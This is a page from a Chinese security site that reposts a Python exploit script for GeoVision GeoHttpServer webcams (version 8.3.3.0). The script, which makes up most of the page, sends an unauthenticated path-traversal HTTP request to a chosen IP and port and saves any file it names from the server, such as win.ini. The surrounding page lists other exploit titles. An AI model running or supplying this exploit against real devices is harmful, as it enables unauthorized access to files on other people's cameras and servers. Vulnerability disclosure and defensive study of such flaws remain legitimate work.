首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit
来源:minin.viktor@gmail.com 作者:Minin 发布时间:2015-06-11  
#!/usr/bin/python
import os
import sys
import socket
import binascii
 
'''
Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID      : none
Product     : GeoVision
System      : GeoHttpServer
Affected    : 8.3.3.0 (may be more)
Impact      : Critical
Remote      : Yes
Website link: http://www.geovision.com.tw/
Reported    : 10/06/2015
Author      : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''
 
#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');
 
socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"
 
 
def main():
    print "#######################################################################"
    print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
    print "# Usage: <ip> <port> <file>"
    print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"
    print "#######################################################################"
    exit()
 
try:
    url     = sys.argv[1]
    port    = int(sys.argv[2])
    #files  = open(sys.argv[3],'r').read().split()
    file    = sys.argv[3]
except:
    main()
    
def recvall(sock):
    data = ""
    part = None
    while part != "":
        part = sock.recv(4096)
        data += part
    return data
 
def request(url, port, pfile):
    PATH = str(pfile)  
    HOST = url
    PORT = port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((HOST, PORT))
    sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
    data = recvall(sock)
    temp = data.split("\r\n\r\n")
    sock.shutdown(1)   
    sock.close()
    return temp[1]
 
ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()
 
#~EOF
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ProFTPD 1.3.5 Mod_Copy Command
·Libmimedir VCF Memory Corrupti
·Apexis IP CAM Username / Passw
·This POODLE Bites: Exploiting
·Microsoft Internet Explorer 11
·OSSEC 2.8.1 Local Root Escalat
·Viber Remote Crash Proof Of Co
·D-Link DSP-W110 Command Execut
·Microsoft Windows HTA Crash Pr
·foobar2000 1.3.8 (.m3u) Local
·Beckhoff IPC Diagnositcs Authe
·OpenBSD 5.7 sys_execve() Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved